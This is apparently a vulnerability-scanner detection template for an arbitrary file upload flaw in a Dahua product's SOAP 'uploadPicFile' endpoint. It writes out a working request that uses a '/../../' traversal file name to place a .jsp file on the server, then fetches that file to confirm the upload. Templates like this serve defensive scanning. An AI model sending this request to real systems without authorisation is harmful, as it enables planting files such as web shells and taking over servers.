name: dahua-zhyq-pio-fileupload
set:
    randstr: randomLowercase(20)
    r2: randomLowercase(32)
    randbody: base64(r2)
rules:
  - method: POST
    path: "/emap/webservice/gis/soap/poi"
    Content-Type: text/xml;charset=UTF-8
    body: "\
        <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:res=\"http://response.webservice.poi.mapbiz.emap.dahuatech.com/\">\r\n\
        <soapenv:Header/>\r\n\
        <soapenv:Body>\r\n\
        <res:uploadPicFile>\r\n\
        <!--type: string-->\r\n\
        <arg0>/../../{{randstr}}.jsp</arg0>\r\n\
        <!--type: base64Binary-->\r\n\
        <arg1>{{randbody}}</arg1>\r\n\
        </res:uploadPicFile>\r\n\
        </soapenv:Body>\r\n\
        </soapenv:Envelope>\r\n\
          "
    expression: |
      response.status == 200  && response.body.bcontains(b'xmlns:')
  - method: GET
    path: "/upload/{{randstr}}.jsp"
    follow_redirects: true
    expression: |
      response.status == 200 && response.body.bcontains(bytes(r2))

detail:
  author: 666